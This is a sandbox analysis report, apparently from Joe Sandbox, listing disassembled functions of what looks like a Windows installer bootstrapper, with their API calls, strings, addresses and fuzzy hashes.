Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp$wininet.dll
API String ID: 1866314245-1140179540
Opcode ID: 2332d516e190071655f06d51377055d4144ccc878959d9a144283f4ac75c5670
Instruction ID: d864ca8f86287ae6661611503e74a085ceb4b984ea973d3c1e5953a10b372be4
Opcode Fuzzy Hash: 2332d516e190071655f06d51377055d4144ccc878959d9a144283f4ac75c5670
Instruction Fuzzy Hash: A111C672B44721AFEB216B69AC05F5736D4AF04751F02512AFE0DF7190DB24CC0087D4

Function 00E6B2F6 Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 553COMMON

Download Yara Rule

Strings

UX aborted cache., xrefs: 00E6B350
(, xrefs: 00E6B760
Failed to set syncpoint event., xrefs: 00E6B88F
begin cache package, xrefs: 00E6B4AF
apply.cpp, xrefs: 00E6B346, 00E6B882
layout bundle, xrefs: 00E6B452
end cache package, xrefs: 00E6B707

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID:
String ID: ($Failed to set syncpoint event.$UX aborted cache.$apply.cpp$begin cache package$end cache package$layout bundle
API String ID: 0-826262529
Opcode ID: 7b710f2bd9e4cb2b8b625236bffe021e735cda37e567059e996d87ccd7c88c3f
Instruction ID: d072754d647a997bd0e8478950af8004c6ea3b17ed5115a58ddc1a0e7a94479b
Opcode Fuzzy Hash: 7b710f2bd9e4cb2b8b625236bffe021e735cda37e567059e996d87ccd7c88c3f
Instruction Fuzzy Hash: 60226572A40615FFCB15CF94D880FAABBB6FF48750F109259F914BB261C331A9A1DB90

Function 00E44690 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00E446B5
GetCurrentThreadId.KERNEL32 ref: 00E446BB

Part of subcall function 00E5FC51: new.LIBCMT ref: 00E5FC58

GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E44749

Strings

user.cpp, xrefs: 00E44795
wininet.dll, xrefs: 00E446E8
Failed to load UX., xrefs: 00E446FE
Unexpected return value from message pump., xrefs: 00E4479F
Failed to create user for UX., xrefs: 00E446D5
Failed to start bootstrapper application., xrefs: 00E44717

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 7e48da7a883c52a23afee025dc68fcf4d6bbf59a44be5efb0cb80dc4eb69c115
Instruction ID: 8c04e6fdba279a3ba0bb7a505789c31789da0f823727edc8aec2f3cc17d117fa
Opcode Fuzzy Hash: 7e48da7a883c52a23afee025dc68fcf4d6bbf59a44be5efb0cb80dc4eb69c115
Instruction Fuzzy Hash: 6041A4B1700215BFE715ABA4DC89FBAB7ACEF05714F101126F909FB280DB34AD0587A1

Function 00E5473A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000008,?,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000001,00000000), ref: 00E54765
GetLastError.KERNEL32 ref: 00E54772
ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,00000000), ref: 00E5481B
GetLastError.KERNEL32 ref: 00E54825

Strings

Failed to allocate data for message., xrefs: 00E547D9
Failed to read message from pipe., xrefs: 00E547F0
Failed to read data for message., xrefs: 00E54853
pipe.cpp, xrefs: 00E547CF, 00E547E6, 00E54849

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
API String ID: 1948546556-3912962418
Opcode ID: 134eb6f89bf05e7f41c2592e753de0a46072e325235a3d40ee3848452a5bba49
Instruction ID: 353a74d19ecd4319dbb26542b2e8f0bbd227751c45586a735adee0e4cdf1d79b
Opcode Fuzzy Hash: 134eb6f89bf05e7f41c2592e753de0a46072e325235a3d40ee3848452a5bba49
Instruction Fuzzy Hash: 1F31D6B2A40325BBDB109E75DC45BAAB7A8EF0571AF109126FC05F61C0D7749E4887D0

Function 00E4F69D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00E4F7CD
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00E4F7DA

Strings

Resume, xrefs: 00E4F741
Failed to open registration key., xrefs: 00E4F736
Failed to read Resume value., xrefs: 00E4F763
%ls.RebootRequired, xrefs: 00E4F6BA
Failed to format pending restart registry key to read., xrefs: 00E4F6D1

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: c7c41f8da806f6e833db28d51a5e8fa61380db5696ba110d4b9692c6121de7b6
Instruction ID: 5eb5b4ed71be897e56d4bdaf0e47da8e6c023130f11d5f68a416e1c36162b811
Opcode Fuzzy Hash: c7c41f8da806f6e833db28d51a5e8fa61380db5696ba110d4b9692c6121de7b6
Instruction Fuzzy Hash: D6414236910219EFCB11AF98D885AEDBBB5FF05B14F25A177E814BB211C3799E40DB80

Function 00E567B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00E56CFB,@G,?,00000000,?,00000000,00000001), ref: 00E567BD
GetLastError.KERNEL32(?,00E56CFB,@G,?,00000000,?,00000000,00000001), ref: 00E567C7
GetExitCodeThread.KERNELBASE(00000001,00000000,?,00E56CFB,@G,?,00000000,?,00000000,00000001), ref: 00E56806
GetLastError.KERNEL32(?,00E56CFB,@G,?,00000000,?,00000000,00000001), ref: 00E56810

Strings

Failed to wait for cache thread to terminate., xrefs: 00E567F8
core.cpp, xrefs: 00E567EB, 00E56834
Failed to get cache thread exit code., xrefs: 00E56841

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 8b57ac6a6c8b5cb95f33d985e2306e4b235e4a0d5601f02695149c227941b71b
Instruction ID: aff4fff806d960195c99196721d35280933d807f70e7fee67c6dd67338e64622
Opcode Fuzzy Hash: 8b57ac6a6c8b5cb95f33d985e2306e4b235e4a0d5601f02695149c227941b71b
Instruction Fuzzy Hash: 47015B71240304BFEB08AB659D16B7E76E5EB00711F50512EB80AF61E0EB399E04A618

Function 00E5D206 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,00E8B4F0,?,00000001,000000FF,?,?,7694B390,00000000,00000001,00000000,?,00E572F3), ref: 00E5D32F

Strings

elevation.cpp, xrefs: 00E5D23A
Failed to create pipe and cache pipe., xrefs: 00E5D28C
Failed to elevate., xrefs: 00E5D311
Failed to create pipe name and client token., xrefs: 00E5D270
UX aborted elevation requirement., xrefs: 00E5D244
Failed to connect to elevated child process., xrefs: 00E5D318

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: d6fb5bba4955f179fb5abaee53e429765475abe60e7d2d35d35e3c0e41e39695
Instruction ID: 7bc742077881b66b0a9cb8fd74595e2172f7ea5d49a38fb16ef945f39298f067
Opcode Fuzzy Hash: d6fb5bba4955f179fb5abaee53e429765475abe60e7d2d35d35e3c0e41e39695
Instruction Fuzzy Hash: 6C314B72A49721BBEB36A6609C46FAF779CDF00722F103605FD05BB191DA61ED0842A5

Function 00E8041B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00EAB60C,00000000,?,?,?,00E45407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00E8042B
CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,00EAB604,?,00E45407,00000000,Setup), ref: 00E804CC
GetLastError.KERNEL32(?,00E45407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00E804DC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00E45407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00E80515

Part of subcall function 00E42DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00E42F1F

LeaveCriticalSection.KERNEL32(00EAB60C,?,?,00EAB604,?,00E45407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 00E8056E

Strings

logutil.cpp, xrefs: 00E804FA

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: e4ea18d95aa8bb4b4a212dde22559219ce4fa3a6afd1f9420988f9cc3f790457
Instruction ID: b872edd07cc3dc00b7e0d985e393ab452f49205b3030490964431d379c4c010e
Opcode Fuzzy Hash: e4ea18d95aa8bb4b4a212dde22559219ce4fa3a6afd1f9420988f9cc3f790457
Instruction Fuzzy Hash: 5F312771E01325FFEB71BF62DC81A6A3BA8EB04754F015125FA1CBA161C730DD089BA0

Function 00E608F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00E60940
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00E6095F
GetLastError.KERNEL32 ref: 00E60969

Strings

Unexpected call to CabWrite()., xrefs: 00E60923
cabextract.cpp, xrefs: 00E6098D
Failed to write during cabinet extraction., xrefs: 00E60997

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 149ffab41d5866185903558f414a086e827e018bd3dcbd56f83d7acd4ac29afc
Instruction ID: 58f1f136570597b51536d7c0e2f9efc82c692ac1f9d91e6387ae9b1a6fc1ad5c
Opcode Fuzzy Hash: 149ffab41d5866185903558f414a086e827e018bd3dcbd56f83d7acd4ac29afc
Instruction Fuzzy Hash: C1219F76640204AFDB00DF6DED84EAA77E9EFC8750F151059FE08EB256D631D9008B51

Function 00E8076C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,00E58110,00000000), ref: 00E8078A
GetLastError.KERNEL32(?,?,?,?,00E58110,00000000), ref: 00E80794
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00E58110,00000000), ref: 00E807C6
CloseHandle.KERNELBASE(?,?,?,?,?,00E58110,00000000), ref: 00E8081D

Strings

procutil.cpp, xrefs: 00E8080B

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Token$CloseErrorHandleInformationLastOpenProcess
String ID: procutil.cpp
API String ID: 3370771294-1178289305
Opcode ID: 83f55b4ddfd8f5c1848b1a7e1565e11f563e7eabef93d9875f4b764004276060
Instruction ID: 8a36674045aec7b0d894e9311f32c9042de7c99557b8d3f354550f3e55038aa3
Opcode Fuzzy Hash: 83f55b4ddfd8f5c1848b1a7e1565e11f563e7eabef93d9875f4b764004276060
Instruction Fuzzy Hash: D5218472E40228EFDB11AB959C44A9EBBE8EF54711F114166ED1DF7150D3704E48DBD0

Function 00E609B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00E60A25
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E60A37
SetFileTime.KERNELBASE(?,?,?,?), ref: 00E60A4A
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00E60616,?,?), ref: 00E60A59

Strings

Invalid operation for this state., xrefs: 00E609FE
cabextract.cpp, xrefs: 00E609F4

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: cc9658ae35f7c975cdb6c4629aed9f303257c184d69be047f9676a65d9694b9b
Instruction ID: 2ffccb676e791c6f0a0dcff74fde69628a8936a055c66209f7744dfc79c8dad6
Opcode Fuzzy Hash: cc9658ae35f7c975cdb6c4629aed9f303257c184d69be047f9676a65d9694b9b
Instruction Fuzzy Hash: A021A17285022AAF87109FA8E9488AB7BBCFF04764B145216F859F65A0C770DA11CBD0

Function 00E8343B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E8344A
InterlockedIncrement.KERNEL32(00EAB6D8), ref: 00E83467
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00EAB6C8,?,?,?,?,?,?), ref: 00E83482
CLSIDFromProgID.OLE32(MSXML.DOMDocument,00EAB6C8,?,?,?,?,?,?), ref: 00E8348E

Strings

MSXML.DOMDocument, xrefs: 00E83489
Msxml2.DOMDocument, xrefs: 00E8347D

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 9f13f1acbfa9e7c681cb239e4cb7ee96ccbf90d8b37a2017d38b175b942a5552
Instruction ID: 575134ce6061813322e600501881df709664bcb28385d31df1d0d587b2681905
Opcode Fuzzy Hash: 9f13f1acbfa9e7c681cb239e4cb7ee96ccbf90d8b37a2017d38b175b942a5552
Instruction Fuzzy Hash: EDF020307003315AD7226BB2AC0DB072E61ABCBF68F102824EC0CF50B4D360A84187A0

Function 00E84932 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00E8495A
GlobalAlloc.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00E84989
GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00E849B3
GetLastError.KERNEL32(00000000,00E8B790,?,?,?,00000000,00000000,00000000), ref: 00E849F4
GlobalFree.KERNEL32(00000000), ref: 00E84A28

Strings

fileutil.cpp, xrefs: 00E84978, 00E849D1

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: e012f56b4d101a5ee01dc56d972dcd0621e627aba152a8b28a36e60e53908d3c
Instruction ID: 5d96c258dbd1dc937c9ffe806cce85fe0a69fe794483c2c0bd9ea14d7ed0d484
Opcode Fuzzy Hash: e012f56b4d101a5ee01dc56d972dcd0621e627aba152a8b28a36e60e53908d3c
Instruction Fuzzy Hash: 7021C875A4032AABD721BBA58C45EEFBBA8EF84354F015156FD0DF7251E7308D0097A0

Function 00E5E705 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 00E5E734
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00E5E743
SetWindowLongW.USER32(?,000000EB,?), ref: 00E5E757
DefWindowProcW.USER32(?,?,?,?), ref: 00E5E767
GetWindowLongW.USER32(?,000000EB), ref: 00E5E781
PostQuitMessage.USER32(00000000), ref: 00E5E7DE

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: fc59a7b9d2b2519fe7c7f4e32471f3d0bc14f8e8c8d0802e76da5b873668e1e3
Instruction ID: 1f2bba7d0367197941f05a47dc07bf279e39ab17ab4ca2352c52e551a77b57e8
Opcode Fuzzy Hash: fc59a7b9d2b2519fe7c7f4e32471f3d0bc14f8e8c8d0802e76da5b873668e1e3
Instruction Fuzzy Hash: 8921C132104118BFDF159FA4DC48EAA7BA9EF49355F104915FD0ABA2A0C770DE18DB60

Function 00E810C5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149registrystringCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 00E810ED
RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,00E56EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 00E81126
lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 00E8121A

Strings

BundleUpgradeCode, xrefs: 00E810CC
regutil.cpp, xrefs: 00E81161

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: QueryValue$lstrlen
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 3790715954-1648651458
Opcode ID: 67b28cd89c59f80d08273f1cb42ed5d687efa7f79b968704acdcd0b3c9d2c40f
Instruction ID: 7b856947fc4cda9de0b0de4f62ed3278b3a178234fe105e49b21c0c64ef9cced
Opcode Fuzzy Hash: 67b28cd89c59f80d08273f1cb42ed5d687efa7f79b968704acdcd0b3c9d2c40f
Instruction Fuzzy Hash: B2418631A01219EFDB15AF99C885AAEB7BDEF44710F1151A9ED1DFB220D630DD029790

Function 00E6AAE8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract payload: %ls from container: %ls, xrefs: 00E6ABE3
Failed to extract all payloads from container: %ls, xrefs: 00E6AB9C
Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 00E6ABEF
Failed to open container: %ls., xrefs: 00E6AB2A

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
API String ID: 1214770103-3891707333
Opcode ID: 92336681c8284280ec6dac482f98fe186f70ea6960c6f629778363e9e048466b
Instruction ID: 98113a2951dc6d6ae7006a9005d032d32e98df1e0d89542c721fea28c7e30990
Opcode Fuzzy Hash: 92336681c8284280ec6dac482f98fe186f70ea6960c6f629778363e9e048466b
Instruction Fuzzy Hash: 1A310532C40219BBCF11EAE4EC46E8E77B9EF04350F242125FA15B7291E730D9509F91

Function 00E607E4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00E6088A
GetLastError.KERNEL32(?,?,?), ref: 00E60894

Strings

Failed to move file pointer 0x%x bytes., xrefs: 00E608C5
Invalid seek type., xrefs: 00E60820
cabextract.cpp, xrefs: 00E608B8

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 3ca5385e20e4da900889f67cd77ac5c417ea279a1a95a3d72042c5521b849dda
Instruction ID: b5995d9d370a08cb82b92707b4c3d4c0402e327b3ab83ff06202082e148d3ee5
